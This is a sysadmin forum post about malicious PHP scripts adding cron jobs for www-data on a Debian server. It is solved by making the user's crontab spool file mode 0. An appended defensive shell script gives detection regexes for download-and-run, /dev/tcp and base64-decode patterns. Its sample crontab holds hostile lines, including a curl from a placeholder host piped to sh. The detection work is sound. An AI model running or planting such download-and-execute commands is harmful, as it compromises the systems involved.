My old Debian server is running PHP as DSO and some malicious scripts are always adding cron jobs for the system user "www-data". I could see too many malicious crons getting added for this user somehow. As the server is running PHP as DSO, we are unable to track the exact process adding the cron.
Q. How can I disable "www-data" from adding crons further, like disabling the entire cron mechanism for the user? Is that possible?
Q. How can we find which PHP script does this cron edit?
I could see the below in the cron documentation.
"at.allow and at.deny"
You can also use the /etc/at.allow and /etc/at.deny files to manage who can schedule jobs with at.
The /etc/at.allow file can contain a list of users that are allowed to schedule at jobs. When /etc/at.allow does not exist, then everyone can use at unless their username is listed in /etc/at.deny.
There is an /etc/at.deny file and "www-data" is in it; meanwhile it still can execute crons.
Finally I have found a solution of my own: I adjusted the cron settings for the Apache user in such a way that the "www-data" user is not able to add a cron any more.
touch /var/spool/cron/crontabs/www-data; chmod 0 /var/spool/cron/crontabs/www-data
Below is the result of the above adjustments.
$ su www-data
$ crontab -e
crontabs/www-data/: fdopen: Permission denied
$
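As an added example (not part of the original post), the shell functions below audit a crontab spool file for the kind of dropped jobs described above and verify that the "chmod 0" lockdown is in place. The indicator patterns, the sample crontab and the placeholder host are constructed for illustration.

```shell
#!/bin/sh
# Added example: audit a crontab file for common indicators of an injected job
# and check the mode-0 lockdown applied to /var/spool/cron/crontabs/www-data.
# The regexes below are illustrative indicators, not an exhaustive rule set.

# Print numbered crontab lines (comments excluded) that download-and-execute
# remote content, decode an inline blob, open a raw socket, or run from /tmp.
suspicious_cron_lines() {
    # $1 = path to a crontab file
    grep -E -n \
        -e '(curl|wget)[^|]*\|[[:space:]]*(ba)?sh' \
        -e 'base64[[:space:]]+(-d|--decode)' \
        -e '/dev/tcp/' \
        -e '/tmp/[^[:space:]]*\.(sh|pl|py)' \
        "$1" | grep -v -E '^[0-9]+:[[:space:]]*#'
}

# Number of matching lines, so a monitoring job can alert on a nonzero value.
count_suspicious() {
    suspicious_cron_lines "$1" | wc -l | tr -d ' '
}

# Succeed only when the spool file exists with mode 0000, as in the fix above.
spool_is_locked() {
    # $1 = spool file, e.g. /var/spool/cron/crontabs/www-data (assumed path)
    [ -f "$1" ] && [ "$(stat -c %a "$1")" = "0" ]
}

# Self-contained demo over a constructed crontab; prints the match count (2).
demo() {
    tmp=$(mktemp)
    cat > "$tmp" <<'EOF'
# m h dom mon dow command
0 3 * * * /usr/local/bin/backup.sh
*/5 * * * * curl -s http://EXAMPLE-PLACEHOLDER/x | sh
*/10 * * * * echo aGk= | base64 -d | sh
EOF
    count_suspicious "$tmp"
    rm -f "$tmp"
}
```

Run `count_suspicious /var/spool/cron/crontabs/www-data` from a root cron job or monitoring check to be alerted when such entries reappear.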